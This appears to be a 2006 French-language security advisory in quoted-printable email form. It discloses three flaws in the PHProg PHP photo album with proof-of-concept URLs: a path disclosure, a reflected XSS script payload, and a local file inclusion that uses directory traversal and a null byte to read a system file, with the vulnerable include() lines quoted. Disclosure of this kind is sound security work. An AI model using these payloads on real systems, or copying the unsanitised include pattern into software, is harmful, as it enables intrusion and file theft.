------=_Part_3877_18013116.1157965429026
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
(11/09/06)
* Produit vuln=E9rable : PHProg ( Album photo en PHP )
* Site officiel du produit : http://www.PHProg.com/
* Failles de s=E9curit=E9 d=E9cel=E9es :
1] Full path disclosure : http://localhost/PHProg/?id=3D1&album=3Dcdg393
2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=3D1&album=3D
3] Local File Inclusion :
http://localhost/PHProg/index.php?lang=3D../../../../../../BOOT.INI%00
Ligne 59 =3D> $lang=3D$_GET['lang'];
Ligne 61 =3D> include("lang/$lang.php");
* Credits : cdg393 : cdg.new.fr =3D)
------=_Part_3877_18013116.1157965429026
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
(11/09/06)
* Produit vuln=E9rable : PHProg ( Album photo en PHP )
* Site officiel du produit : http:/=
/www.PHProg.com/
* Failles de s=E9curit=E9 d=E9cel=E9es :
1] Full path disclosure :=20
http://local=
host/PHProg/?id=3D1&album=3Dcdg393
2] Cross Site Scripting (=
XSS ) : http://lo=
calhost/PHProg/?id=3D1&album=3D
<script>alert('cdg393')</script>
3] Local File Inclu=
sion : http://localhost/PHProg/index.php?lang=3D../../../../.=
./../BOOT.INI%00
Ligne 59 =
=3D> &=
nbsp; $lang=3D$_GET['lang'];
=
Ligne 61 =3D> =
; include("=
;lang/$lang.php");
&nbs=
p; &n=
bsp; &=
nbsp;
* Credits : cdg393 :=20
cdg.new.fr =3D)
------=_Part_3877_18013116.1157965429026--